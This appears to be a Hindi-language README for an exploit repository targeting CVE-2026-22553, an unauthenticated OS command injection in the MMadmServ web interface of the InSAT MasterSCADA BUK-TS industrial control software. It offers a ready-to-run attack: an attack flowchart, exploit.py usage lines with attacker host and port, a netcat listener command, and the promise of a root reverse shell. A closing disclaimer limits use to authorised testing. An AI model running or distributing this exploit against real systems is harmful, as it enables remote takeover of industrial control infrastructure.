
CVE-2026-22553 | CVSS 9.8 गंभीर| एक्सप्लॉइट लेखक Mohammed Idrees Banyamer
InSAT MasterSCADA BUK-TS का MMadmServ वेब इंटरफ़ेस बिना प्रमाणीकरण के OS कमांड इंजेक्शन भेद्यता से ग्रस्त है। यह दोष दूरस्थ हमलावरों को बिना किसी प्रमाणीकरण के पूर्ण रिमोट कोड निष्पादन (RCE) प्राप्त करने की अनुमति देता है।
flowchart TD
A[Attacker] -->|HTTP POST Request| B[MMadmServ Web Interface]
B -->|Unauthenticated| C[Vulnerable Parameter]
C -->|OS Command Injection| D[Command Execution on Target Server]
D -->|Reverse Shell| E[Attacker's Listener\nnc -lvnp <port>]
style A fill:#ff4d4d,stroke:#fff
style E fill:#4dff88,stroke:#fff
python3 exploit.py <target_url> --lhost <your_ip> --lport <your_port>
python3 exploit.py http://192.168.1.50:8080 --lhost 192.168.1.100 --lport 4444
| विकल्प | विवरण |
|---|---|
target | लक्ष्य URL (जैसे http://ip:port) |
--lhost | आपका IP पता (रिवर्स शेल) |
--lport | आपका लिसनिंग पोर्ट |
अपनी मशीन पर एक लिसनर शुरू करें:
nc -lvnp 4444
एक्सप्लॉइट चलाएँ:
python3 exploit.py http://target-ip:port --lhost your-ip --lport 4444
रूट/सिस्टम विशेषाधिकारों के साथ एक रिवर्स शेल प्राप्त करें।
यह एक्सप्लॉइट केवल शैक्षिक और अधिकृत पैठ परीक्षण उद्देश्यों के लिए प्रदान किया गया है।
जिन सिस्टम के आप स्वामी नहीं हैं, उनके विरुद्ध अनधिकृत उपयोग अवैध है और अंतर्राष्ट्रीय कानूनों का उल्लंघन हो सकता है।
लेखक किसी भी दुरुपयोग के लिए ज़िम्मेदार नहीं है।
Mohammed Idrees Banyamer
यदि आपको यह रिपॉज़िटरी उपयोगी लगी तो इसे स्टार ⭐ दें!